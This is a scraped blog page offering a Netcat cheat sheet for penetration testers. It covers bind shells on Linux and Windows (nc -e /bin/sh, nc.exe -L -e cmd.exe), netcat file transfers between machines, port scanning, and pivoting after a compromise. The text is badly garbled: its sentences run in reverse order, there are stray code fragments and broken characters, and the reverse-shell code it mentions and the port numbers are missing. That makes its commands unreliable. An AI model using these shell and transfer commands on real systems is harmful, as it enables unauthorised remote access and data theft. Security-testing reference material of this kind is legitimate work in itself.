naxnumber.blogg.se - Netcat windows cheat sheet

P = r.exec( as String)Īnd a shorter Perl reverse shell that does not depend on /bin/sh: The following command opens a listening shell in 10.0.0.1:

This shell binds a shell in port 1234 (good for installed ruby in the victim machine): This code assumes that the TCP connection uses file descriptor 3. This was tested under Linux / Python 2.7: The commands above will scan from port 1 to 1000. Note: The "-n" parameter here prevents DNS lookup, "-z" makes nc not receive any data from the server, and "-w 1" makes the connection timeout after 1 second of inactivity. There is no difference between transferring binary and text files (most of the time). Note: You might want to run a file command to identify the type of the file you want to transfer.

type input.exe | nc -vv 4444 - Run in Windows box.

nc.exe -lvvp 4444 > output.exe - Running in the Linux box.

This can be used to transfer all type of files from windows to Linux:

nc.exe -lvvp 4444 > output.txt - Running in the Linux/Unix-like box.

This can be used to transfer types of files from Linux to windows:

nc -l -p -e /bin/sh - Running in Linux/Unix-like box.

Launching a listening shell in Linux/Unix-like and binding from Windows:

nc.exe -L -p -e cmd.exe - Running in windows box.

Launching a listening shell in windows and binding from linux: Do pivoting (e.g after compromising a machine use windows tools to escalate e.t.c). Run Vulnerability Scans (e.g Identify null sessions, test for LANMAN services e.t.c).ģ. Perform Administration Security tasks (e.g use windows/linux netcat to bind shells e.t.c).Ģ. Tiny simple scripts and commands that a Penetration tester or a Securityġ. In this page I will periodically post Linux This part of the blog is dedicated to Linux and Unix-like commands that can be usedįrom Penetration Testers (yea who is your tester?) and Information